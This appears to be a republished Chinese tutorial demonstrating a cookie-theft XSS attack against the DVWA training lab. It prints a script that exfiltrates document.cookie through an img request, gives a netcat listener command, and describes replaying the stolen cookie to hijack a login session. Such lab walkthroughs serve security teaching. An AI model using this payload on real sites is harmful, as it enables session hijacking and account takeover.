主頁 >  其他 > XSS cookie偽造攻擊

XSS cookie偽造攻擊

2023-06-14 08:45:48 其他

環境

系統:windows 7

靶場:DVWA

場景:chrome對firefox的個人cookie盜用偽造

IP:192.168.98.128

埠:未占用的任意埠  [1024-49151]

實施

1.首先確保firefox登錄狀態,即存在cookie

2.構造獲取cookie的js請求腳本

<script>
    document.write(    
        '<img src="https://www.cnblogs.com/Wizo-WLsecTeam/p/url'+
         document.cookie+
        '"/>'    
    //利用img標簽特性,生成src的GET請求并獲取請求頁面cookie,然后作為圖片去展示;    
    );
//通過document.write寫到網頁中來-執行img標簽-去觸發指令-生成一個含cookie的GET請求
</script>
//因為src=https://www.cnblogs.com/Wizo-WLsecTeam/p/“”中引號內容只會作為資料字串進行展示,所以需引進script腳本去執行document.cookie,對標簽和執行內容進行‘單引號’分隔和【資料+指令+資料】的拼接

原理:構造一個訪問請求來盜取瀏覽器頁面的cookie

3.提交執行腳本

在任意輸入框進行提交,注意繞過前端輸入長度限制

4.進行nc埠監聽

nc  -lp  8011

 注:此處須保持與構造請求的埠一致!!

5.替換cookie實作偽造盜用

  • 1.打開chrome瀏覽器訪問DVWA
  • 2.找到頁面cookie資訊
  • 3.進行cookie值的替換

6.實作登錄

此處并不是直接重繪頁面,因為其登錄頁面是固定的,我們要通過cookie的盜用直接獲取其登錄狀態,因此此處訪問的應該是首頁

http://127.0.0.1:8082

 可以看到成功進入DVWA的頁面,攻擊完成,

TRANSLATE with x English
Arabic Hebrew Polish
Bulgarian Hindi Portuguese
Catalan Hmong Daw Romanian
Chinese Simplified Hungarian Russian
Chinese Traditional Indonesian Slovak
Czech Italian Slovenian
Danish Japanese Spanish
Dutch Klingon Swedish
English Korean Thai
Estonian Latvian Turkish
Finnish Lithuanian Ukrainian
French Malay Urdu
German Maltese Vietnamese
Greek Norwegian Welsh
Haitian Creole Persian  
  TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back ------------------------------------------- 天寒地凍,路遙馬亡,--------------------------------------------

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555082.html

標籤:其他

上一篇:【解決方法】銳捷EVE模擬器中VPC無法通過DHCP獲取IP地址,改用介面獲取地址

下一篇:返回列表

標籤雲
其他(160915) Python(38226) JavaScript(25493) Java(18235) C(15237) 區塊鏈(8270) C#(7972) AI(7469) 爪哇(7425) MySQL(7248) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5875) 数组(5741) R(5409) Linux(5347) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4591) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2435) ASP.NET(2404) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) .NET技术(1984) 功能(1967) HtmlCss(1964) Web開發(1951) C++(1939) python-3.x(1918) 弹簧靴(1913) xml(1889) PostgreSQL(1881) .NETCore(1863) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • XSS cookie偽造攻擊

    環境 系統:windows 7 靶場:DVWA 場景:chrome對firefox的個人cookie盜用偽造 IP:192.168.98.128 埠:未占用的任意埠 [1024-49151] 實施 1.首先確保firefox登錄狀態,即存在cookie 2.構造獲取cookie的js請求腳本 < ......

    uj5u.com 2023-06-14 08:45:48 more
  • 【解決方法】銳捷EVE模擬器中VPC無法通過DHCP獲取IP地址,改用介面

    # 環境: >工具:銳捷EVE模擬器,VMware Workstation Pro 遠程工具:SecureCRT 系統版本:Windows 10 # 問題描述: >描述:一個簡單的DHCP環境,使用VPC充當PC客戶機,IP地址獲取為DHCP方式。但在發送request資料包后,服務器服務器已經把地 ......

    uj5u.com 2023-06-14 08:40:24 more
  • 一位老程式員的忠告:別想著靠技術生存一輩子

    程式員,本質就是學習,不斷學習,不被淘汰!而年紀,所謂高薪就是為第二產業打基礎吧!俗話說得好,有錢投資誰還親自動手,創業風險大,還累,當然你要是那種小的生意自然沒問題。基本上35歲前好好存一筆錢,為以后轉行也好,做副業也好,做基礎吧,而怎么在這十幾年的時間里,賺到別人20-30年的錢,對程式員來說,... ......

    uj5u.com 2023-06-13 08:53:49 more
  • 解密Prompt系列8. 無需訓練讓LLM支持超長輸入:知識庫 & unlimifo

    這一章我們聊聊有哪些方案可以不用微調直接讓大模型支持超長文本輸入,分別介紹顯式搜索,unlimiformer隱式搜索,并行輸入的PCW,和并行解碼的NBCE方案 ......

    uj5u.com 2023-06-13 08:48:27 more
  • 一位老程式員的忠告:別想著靠技術生存一輩子

    程式員,本質就是學習,不斷學習,不被淘汰!而年紀,所謂高薪就是為第二產業打基礎吧!俗話說得好,有錢投資誰還親自動手,創業風險大,還累,當然你要是那種小的生意自然沒問題。基本上35歲前好好存一筆錢,為以后轉行也好,做副業也好,做基礎吧,而怎么在這十幾年的時間里,賺到別人20-30年的錢,對程式員來說,... ......

    uj5u.com 2023-06-13 08:41:06 more
  • 醫學生的人工智能實戰課

    # 醫學生的人工智能實戰課-初階 (R version) # Practical AI course for medical students # 教學大綱 Syllabus ## I 準備作業 1. R 和 Rstudio安裝 2. Quarto 和 R Markdown 3. Python 和 ......

    uj5u.com 2023-06-13 08:07:36 more
  • 使用 ChatGPT 創建 APP 的最佳實踐

    ?關注文章下方公眾號,可免費獲取AIGC最新學習資料 導讀:如果你想用用ChatGPT創建應用程式來賺錢,這是你需要知道的。 本文字數:2900,閱讀時長大約:18分鐘 如果你想用ChatGPT創建應用程式來賺錢,這是你需要知道的。 我最好先說出壞訊息。如果你認為可以兩手一攤,就讓ChatGPT為你 ......

    uj5u.com 2023-06-13 08:07:25 more
  • 對DenseTensor進行Transpose

    `ML.NET` 是微軟推出的為. NET 平臺設計的深度學習庫,通過這個東西(`ModelBuilder`)可以自己構建模型,并用于后來的推理與資料處理。雖然設計是很好的,但是由于現在的 AI 發展基本上都以 `python` 實作作為基礎,未來這個東西的發展不好說,特別是模型構建部分。我個人認為 ......

    uj5u.com 2023-06-13 08:07:18 more
  • WMIC遠程執行命令橫向移動

    # WMIC遠程執行命令橫向移動 [TOC] ## 一、wmic介紹 wmic擴展wmi(Windows Management Instrumentation,Windows管理工具) ,提供了從命令列介面和批處理腳本執行系統管理的支持。 wmic命令需要本地管理員或域管理員才可以進行正常使用,普通 ......

    uj5u.com 2023-06-13 08:07:14 more
  • 升級Debian12不會?,那么用這個腳本就對了

    # 前言 2023 年 6 月 10 日,Debian 正式發布了其最新的穩定本12(代號 bookworm )。作為一名 Linux 的愛好者,怎能不第一時間升級它。 相對于 Debian 11,Debian 12 包含大量更新的軟體包(上一版本中超過 67% 的包)。個人感徑訓是可以升級的,不過 ......

    uj5u.com 2023-06-13 08:06:59 more